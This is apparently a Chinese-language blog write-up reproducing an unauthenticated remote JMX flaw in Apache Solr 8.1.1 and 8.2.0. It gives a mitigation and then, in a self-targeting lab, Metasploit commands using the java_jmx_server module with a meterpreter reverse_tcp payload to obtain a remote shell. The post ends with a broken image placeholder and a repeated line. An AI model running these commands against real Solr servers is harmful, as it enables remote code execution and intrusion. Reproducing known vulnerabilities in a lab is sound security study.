声明
好好学习,天天向上
漏洞描述
Apache Solr的8.1.1和8.2.0版本的自带配置文件solr.in.sh中存在不安全的选项ENABLE_REMOTE_JMX_OPTS=“true”。如果受害者使用了该默认配置,则会在默认端口18983开放JMX服务,且默认未开启认证。任何可访问此端口的攻击者可利用此漏洞向受影响服务发起攻击,执行任意代码。
建议快速响应,将solr.in.sh配置文件中的ENABLE_REMOTE_JMX_OPTS选项设置为false,然后重启Solr服务。
影响范围
Apache Solr8.1.1和8.2.0版本
复现过程
这里使用8.2.0版本
下载地址
http://archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.zip
下载后,放到kali,linux中,msf和solr都在kali中,我这里省点事,相当于自己打自己了,kali的IP为192.168.239.139
解压完成后进入该文件夹的bin目录下
查看solr.in.sh文件发现ENABLE_REMOTE_JMX_OPTS="true"选项开启
在bin目录下执行命令
./solr start -force
一旦扫描发现开启了18983
就可以开启msf了
命令行启动msf
msfconsole
设置目标信息
use exploit/multi/misc/java_jmx_server
set RHOST 192.168.239.139
set RPORT 18983
设置攻击载荷(反连shell)
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.239.139
set LPORT 4444
设置完毕后可以开始攻击,拿到shell
run
…(img-lrqKUpbp-1606037663158)]
设置完毕后可以开始攻击,拿到shell
run